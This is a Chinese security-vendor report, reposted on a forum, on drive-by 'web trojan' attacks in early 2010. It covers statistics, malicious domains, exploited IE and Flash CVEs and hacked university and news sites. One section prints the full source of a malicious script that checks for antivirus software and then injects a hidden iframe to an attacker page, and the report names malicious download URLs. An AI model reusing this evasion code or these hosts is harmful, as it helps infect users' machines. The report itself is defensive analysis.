| 1、2010年上半年挂马数据统计·挂马网站统计 2010年上半年共拦截恶意网站4,613,000个,以4月拦截最多784,000个。因为挂马网站访问量的大小会直接导致中木马机率的高低,所以选择流量大的网站挂马已成为新的趋势。在统计中可以看出,2月份挂马数量增长明显,在4月高峰期后,渐渐表现出回落趋势。 
图1 2010年上半年共拦截恶意网站
·恶意网站的地域分布
2010年上半年,纵观中国大陆地区恶意网站的地域分布,经统计大部分来自于广东省,占总比例的11%;其次是江苏、湖南等地,也占了不少份额;北京,由于特殊的地位,紧随其后,占了总比例的6%;其他省、直辖市占了总比例的21%。
图2 恶意网站的地域分布
·恶意网站统计 2010年上半年,对截获的恶意网站统计来看,顶级域名以“.org”为主。在统计恶意域名Top10时,发现40%的恶意网站集中在我国的广东地区。
| 排名 | 恶意域名 | 1 | annil.8866.org | 2 | a.ppmmoo.cn | 3 | vod123.8866.org | 4 | cptiandi.com | 5 | web.nba1001.net | 6 | ferrari10.7766.org | 7 | ada.bij.pl | 8 | aa44.qq66.in | 9 | rezervzv.ru | 10 | aan.osa.pl |
表格1 恶意网站统计
恶意域名有着时效性,挂马者会经常更换恶意域名,为了防止安全厂商将其收录为黑名单后,以减小网马的传播范围;或是有关机关将其封杀,以阻断它的传播。·域名利用情况
根据2010年上半年来对挂马网站域名类型统计来看,“.org”域名被黑客利用最多,居其首位,“.cn”其次。恶意网站的存活时间是有限的,黑客为了降低成本,会有选择性的选择价格低廉的域名。
图3 恶意网域名类型对比
·网马漏洞利用情况
纵观2010年上半年网马漏洞利用方面,与2009年相比有较大变化,由集成网马转向了利用单一漏洞挂马,为了增加挂马的成功率,老漏洞很少出现在挂马利用上,而且更新迭代较快。“极光”漏洞(MS10-002)的出现,受到挂马者的青睐,不过也只是风靡一时,当MS10-018(CVE-2010-0806)出现时,又使挂马者的目光转向了它,也是当前挂马者主要利用的漏洞。
图4 网马利用漏洞对比图
·利用网马传播的木马 木马传播的途径有很多,可以利用U盘,电子邮件、通讯软件等途径进行传播,然而利用最多而且最有效的就是利用挂马网站进行传播;经统计,2010年上半年通过挂马网站传播的木马,主要以网游盗号类木马居多,其次是木马下载器、后门类病毒程序,可见挂马者目的性很强,纯粹为了金钱利益。 | 排名 | 病毒名 | 1 | Trojan/Win32.OnLineGames.uszg[GameThief] | 2 | Trojan/Win32.OnLineGames.bkzl[GameThief] | 3 | Trojan/Win32.OnLineGames.bkxt[GameThief] | 4 | Trojan/Win32.OnLineGames.bnkb[GameThief] | 5 | Trojan/Win32.WOW.ipf[GameThief] | 6 | Trojan/Win32.OnLineGames.bnjy[GameThief] | 7 | Trojan/Win32.Geral.hwx[Downloader] | 8 | Trojan/Win32.QQPass.ufz[Stealer] | 9 | Trojan/Win32.VB.efc[Clicker] | 10 | Backdoor/Win32.Agent.tnr |
表格 2木马排名
挂马在不同类的网站占比也是不同的,在2010年上半年被挂马网站分类对比图中列出了各个不同类别网站的占比。其中以娱乐网站占比最多为25%,游戏网站占比17%排在第二位。这两类网站人们关注范围大,点击次数多,直接促使网马的占比提升。
图5 挂马网站分类对比
·2010年上半年大站挂马
下面是2010年上半年最具有影响力的挂马网站,知名网站的流量大,正是挂马者最看重的原因。一旦对知名网站挂马成功,那么木马的传播量与传播速度则会相当惊人。以下是上半年大站挂马排名TOP10。 | 发现时间 | 被挂马网站 | 链接 |
2010-01-20 |
博客大巴 |
http://ndyle.blogbus.com/ |
2010-02-08 |
北方新闻网 |
http://www.northnews.cn/news/2010/201001/2010-01-31/249081.html |
2010-03-22 |
互联星空 |
http://mag2.js.vnet.cn/html/instas/2362.html |
2010-03-31 |
互联网实验室 |
http://www.chinalabs.com/ |
2010-04-19 |
手机中国 |
http://v.cnmo.com/commend/13/12752.html |
2010-04-21 |
IT168 |
http://diybbs.it168.com/thread-58888-1-1.html |
2010-05-18 |
中国电视体育联播平台 |
http://www.cspn.cn/templates/en_ad/html/137.html |
2010-05-20 |
58同城 |
http://zixun.58.com/aoyun/html_list/?wow/ |
2010-05-31 |
猫扑 |
http://bbs.game.mop.com/index.php |
2010-06-29 |
扬子晚报 |
http://www.yangtse.com/bbs/templates/colors/1234.html |
表格 3被挂马网站发现时间 ·2010年上半年高校挂马
芸芸学子在准备着每年一次高考的同时,也会光顾各大高校网站了解更多的信息从而选择报考,经统计,每年的高考前后也是一年中高校挂马最多的时候,下面是上半年高校挂马排名TOP10。 | 发现时间 | 被挂马网站 | 链接 |
2010-01-29 |
北京工业大学 |
http://yjsgl.bjut.edu.cn/bgdadmin/ |
2010-02-25 |
山西师范大学 |
http://www.sxnu.edu.cn./change/dzjg/tw/index.asp |
2010-03-09 |
福州大学 |
http://student.fzu.edu.cn/html/wow/1376.html | 2010-04-29 |
北京外国语大学 |
http://hq.bfsu.edu.cn/Index.html |
2010-04-29 |
清华大学 |
http://thsports.tsinghua.edu.cn/ |
2010-04-29 |
复旦大学 |
http://www.optics.fudan.edu.cn/news/wow/1588.html |
2010-05-28 |
扬州大学 |
http://jpkc.yzu.edu.cn/course/dwcrb/0102kcts.asp |
2010-06-23 |
武汉大学 |
http://sim.whu.edu.cn/diaocha/image/cdk/2103.html |
2010-06-30 |
北京师范大学 |
http://erm.bnu.edu.cn/ |
2010-06-30 |
中国人民大学 |
http://xcb.ruc.edu.cn/xcontent.asp?id=169 |
表格 4被挂马网站发现时间
典型案例:2010年1月20日,搜捕论坛(http://bbs.51sobu.com/)被挂马,被黑客利用的便是MS10-002漏洞。
MS10-018漏洞 2010年3月9日,微软官方发布安全通报981374(CVE-2010-0806),此漏洞涉及到IE6、IE7、IE8,30日微软在安全公告上发布MS10-002,并为此漏洞提供了升级补丁程序;网马溢出代码曝光之后,MS10-018漏洞被挂马者广泛应用于挂马中,也基本取代了MS10-002的在网马中地位。
典型案例:2010年3月24日,沈阳公安交警信息网(http://www.sygajj.gov.cn/)被挂马,黑客利用的便是MS10-018漏洞。
Adobe Flash Player、Adobe Reader 、Acrobat漏洞
2010年6月4日,Adobe公司的Adobe Flash Player、Adobe Reader 、Acrobat爆出0day漏洞,CVE编号为CVE-2010-1297,Adobe已经确定Adobe Flash Player 10.0.45.2或更早的版本存在漏洞,安装Adobe Reader and Acrobat 9.x版本的Windows,Macintosh 和UNIX操作系统中的authplay.dll组件存在问题。此漏洞可能引起崩溃并且允许远程攻击者控制受影响的系统。
典型案例:2010年6月10日,长安大学(http://roadtunnel.chd.edu.cn/dede/coimg/100.html)被挂马,黑客利用的便是Adobe Flash Player漏洞(CVE-2010-1297)。 
3.网马反检测手段
杀毒软件在与网马不断较量中逐渐成熟,挂马者也从未停歇前进的步伐,他们不断挖掘新的漏洞,使用新的反检测手段,以逃避杀软的查杀。网马反检测除了普遍的加密、变形、混淆技术采用了挂马者认为更有效的手段来实践于挂马。本节从以下3个方面介绍下目前网马流行的反检测手段。·反侦察
挂马者为了防止杀软对网马检测,在代码中加入了对相关安全产品的检测,如果发现有这些安全产品,便不执行网马代码,以使自身存活的周期更长。
案例分析:
在2月初,捕获的很多挂马网站都会调用这个恶意页面(http://bbs.xcdx169.net/include/log.js?YPWRUTWT),从下面代码中我们可以看出,黑客利用RES协议来判断用户的主机是否存在360安全卫士、瑞星两个安全软件的相关资源文件,以此判断用户主机是否已经安装360安全卫士和瑞星,如果存在,那么将不执行最终的网马页面。
“http://bbs.xcdx169.net/include/log.js?YPWRUTWT”页面截图:
图9 页面截图
“http://bbs.xcdx169.net/include/log.js?YPWRUTWT”页面完整代码:function panduan()
{
jc_list = ['res://C:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://C:\\program%20files\\360safe\\360hotfix.exe/GIF/172',
'res://D:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://e:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://f:\\Program%20Files\\360\\360Safe\\360hotfix.exe/GIF/172',
'res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://e:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://f:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123',
'res://C:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360safe\\360Safe.exe/GIF/172',
'res://C:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://D:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://E:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172',
'res://F:\\program%20files\\360\\360safe\\360Safe.exe/GIF/172'];
for ( i= 0; i<jc_list.length; i++)
{
ischeck = 1;
x = new Image();
x.src = "";
x.onerror = function()
{
ischeck = 0;
}
x.src = jc_list;
if (ischeck == 1)
return 1;
delete x;
}
return 0;
}
if(!panduan())
{
document.writeln("<iframe src=http:\/\/game.hsw.cn\/plus\/img\/logo.html?人06 width=100 height=0><\/iframe>");
var a3742tf="51la";var a3742pu="";var a3742pf="51la";
var a3742su=window.location;var a3742sf=document.referrer;var a3742of="";
var a3742op="";var a3742ops=1;var a3742ot=1;var a3742d=new Date();
var a3742color="";if (navigator.appName=="Netscape"){a3742color=screen.pixelDepth;} else {a3742color=screen.colorDepth;}
try{a3742tf=top.document.referrer;}catch(e){}
try{a3742pu =window.parent.location;}catch(e){}
try{a3742pf=window.parent.document.referrer;}catch(e){}
try{a3742ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
a3742ops=(a3742ops==null)?1: (parseInt(unescape((a3742ops)[2]))+1);var a3742oe =new Date();
a3742oe.setTime(a3742oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3742ops+ ";path=/;expires=
"+a3742oe.toGMTString();a3742ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
if(a3742ot==null){a3742ot=1;}else{a3742ot=parseInt(unescape((a3742ot)[2]));
a3742ot=(a3742ops==1)?(a3742ot+1) a3742ot);}a3742oe.setTime(a3742oe.getTime()+365*24*60*60*1000);
document.cookie="AJSTAT_ok_times="+a3742ot+";path=/;expires="+a3742oe.toGMTString();}catch(e){}
a3742of=a3742sf;if(a3742pf!=="51la"){a3742of=a3742pf;}
if(a3742tf!=="51la"){a3742of=a3742tf;}a3742op=a3742pu;try{lainframe}catch(e){a3742op=a3742su;}
document.write('<img style="width:0px;height:0px" src="http://web2.51.la:82/go.asp?svid=4&id=3483742&tpages=
'+a3742ops+'&ttimes='+a3742ot+'&tzone='+(0-a3742d.getTimezoneOffset()/60)+'&tcolor='+a3742color+'&sSize='+screen.width+'
,'+screen.height+'&referrer='+escape(a3742of)+'&vpage='+escape(a3742op)+'" />'); } ·网马中含有“木马”解密代码 网马分析人员大多都有一个习惯,就是在剥茧抽丝中,把藏匿于网马中的木马链接找到,下载木马后对其进行分析,然而挂马者为了防止这一点,首先加密了木马,这样即使下载了木马,没有密钥同样无法运行木马,却在网马shellcode中包含解密代码,只有在执行网马时才能触发木马。
案例分析:
2010年5月31日,安天实验室发现,猫扑·游戏频道综合社区(http://bbs.game.mop.com/index.php)被挂马,利用的是MS10-018漏洞,木马链接为(http://yyyyy.crabdance.com/wbem/image/system.exe),然而单独下载“system.exe”后运行无效后,对此进行了深入分析。 我们知道PE文件头16进制表示为4D 5A,我们用UE以16进制打开“system.exe”,可以看出此文件的前两位D8 CF,用D8异或4D、 CF异或5A就得到了密钥95,由此我们得知此病毒文件是通过异或95进行加密的;然而加密手段有很多,异或只是其中的一种,具体情况要具体分析。
图 11具体分析图
4. 搜索引擎已成为网马传播的主要途径 网马的传播途径有很多,如电子邮件、即时通讯工具、社会工程学等,然而在网络发展的今天,人们在遇到问题时,往往是更依赖于网络通过搜索引擎去寻求答案,黑客便利用这点,首先入侵到一些知名网站,拿到权限后,把一些人群感兴趣的文章(隐藏着恶意代码)上传到该网站上,这样搜索引擎会优先录入这些页面,当这一些人通过关键字搜索时,当点击含有这些关键字的恶意页面,当含有漏洞的系统触发这些恶意代码时,就成为了任人摆布的“肉鸡”。因此,搜索引擎已成为网马传播的主要途径。
案例分析:
2010年6月29日,安天实验室发现,扬子晚报网被黑客入侵,并上传大量与网络游戏相关并含有恶意代码的页面,我们拿其中一挂马页面进行分析,(http://www.yangtse.com/bbs/templates/colors/1252.html),截图如下:
图 12 截图
通过Google搜索引擎搜索关键字 “wowdz手法”(该挂马页面的标题),搜索到的结果有86,800条,对第一页给出每个链接逐个进行分析,含有恶意代码的链接已经用红色方框注明,可以看出除了“百度知道”,其余全是挂马页面。
图13 挂马页面
总结:这只是众多利用搜索引擎传播网马的案例之一,如果用户通过搜索引擎搜索关键字时,多去一些与之相关并且可信任的网站,例如你搜索游戏的关键字,却搜索出一个政府域名(.gov)的链接,这时候你就要考虑一下了。5. 搜索引擎已成为网马传播的主要途径
“挂马网站”为黑色产业链带来巨大的利润,面对这个网络公敌,虽然不乏有好的安全产品出现,但仍旧不能有效阻止它们的传播。在2010年下半年,预计在挂马数量上只增不减。
挂马团伙依旧会不断挖掘新的漏洞,利用新的防检测手段逃避杀软的查杀;每一次热点事件出现时,也是网马趁机传播的时候,黑客会继续跟踪新的热点事件,并选择流量大的网站进行挂马,以促使网马广泛的传播。
全世界为之关注的“2010年南非足球世界杯”已经开始了,在网上查找相关信息的时候,请不要去那些不可信任的小网站,多去一些可信任的大网站;请及时为系统打补丁,当发现有最新版本的第三方应用软件时,请升级到最新版本,这样会给自身系统多一份安全保障。 |
发表于 2010-7-6 14:33
发表于 2010-10-28 12:03
